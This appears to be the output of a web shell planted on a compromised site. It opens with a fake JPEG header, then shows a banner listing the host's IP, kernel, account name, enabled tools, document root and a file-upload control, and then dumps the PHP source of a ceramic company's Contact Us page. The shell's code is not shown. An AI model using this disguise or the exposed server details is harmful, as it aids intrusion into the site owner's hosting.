���� JFIF fdasasfas213sdaf
Server IP : 91.108.106.90 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/nexusceramic.com/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <title>Nexus Ceramic</title> <?php include('assets.php') ?> </head> <!-- page wrapper --> <body> <div class="boxed_wrapper"> <?php include('header.php') ?> <section class="page-title centred" style="background-image: url(assets/images/about-breadcramb.jpg);"> <div class="auto-container"> <div class="content-box"> <div class="title"> <h2>Contact Us</h2> </div> <ul class="bread-crumb clearfix"> <li><a href="index.php">Home</a></li> <li>Contact Us</li> </ul> </div> </div> </section> <section class="google-map-section"> <div class="map-inner"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d58844.129514743676!2d70.75451294863281!3d22.8114258!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x39598dd1ba628833%3A0x118e5c8bbedcf814!2sCroma%20-%20Morbi!5e0!3m2!1sen!2sin!4v1728457171374!5m2!1sen!2sin" width="100%" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> </section> <!-- contact-section --> <section class="contact-section"> <div class="auto-container"> <div class="contact-info-area centred"> <div class="row clearfix"> <div class="col-lg-4 col-md-6 col-sm-12 single-column"> <div class="single-item"> <div class="icon-box"><i class="far fa-map-marker-alt"></i></div> <h5>Address</h5> <p>Bapa K Plaza Second Floor, Shop No. S-14 Behind Vishal Furniture, 8-A National Highway, Morbi, Gujarat, India - 363641</p> </div> </div> <div class="col-lg-4 col-md-6 col-sm-12 single-column"> <div class="single-item"> <div class="icon-box"><i class="far fa-envelope-open"></i></div> <h5>Email Address</h5> <p><a href="mailto:nexusceramic@gmail.com">nexusceramic@gmail.com</a></p> </div> </div> <div class="col-lg-4 col-md-6 col-sm-12 single-column"> <div class="single-item"> <div class="icon-box"><i class="far fa-phone"></i></div> <h5>Phone Us</h5> <p><a href="tel:+919099057990">+91-9099057990</a></p> </div> </div> </div> </div> <div class="contact-form-area"> <form method="post" action="submit.php" onsubmit="return validateRecaptcha()"> <div class="row clearfix"> <div class="col-lg-4 col-md-6 col-sm-12 form-group"> <label>Name</label> <input type="text" name="name" placeholder="Write Your Name" required=""> </div> <div class="col-lg-4 col-md-6 col-sm-12 form-group"> <label>Email Address</label> <input type="email" name="email" placeholder="Write Your Email" required=""> </div> <div class="col-lg-4 col-md-12 col-sm-12 form-group"> <label>Phone Number</label> <input type="text" name="phone" required="" placeholder="Phone Number"> </div> <div class="col-lg-12 col-md-12 col-sm-12 form-group"> <label>Product</label> <input type="text" name="product" required="" placeholder="Product"> </div> <div class="col-lg-12 col-md-12 col-sm-12 form-group"> <label>Write Your Message</label> <textarea name="message" placeholder="Write Message"></textarea> </div> <div class="col-12"> <div class="g-recaptcha" data-sitekey="6LfrYdIqAAAAAFNAmWb7jzLrFDym48cwnqrRKdko"></div> </div> <div class="col-lg-12 col-md-12 col-sm-12 form-group message-btn"> <button class="theme-btn-one" type="submit" name="submit_form">Submit Message</button> </div> </div> </form> </div> </div> </section> <!-- contact-section end --> <script src="https://www.google.com/recaptcha/enterprise.js" async defer></script> <script> function validateRecaptcha() { const recaptchaResponse = document.querySelector('.g-recaptcha-response').value; if (!recaptchaResponse) { alert("Please complete the reCAPTCHA verification."); return false; } return true; } </script> <?php include('footer.php') ?>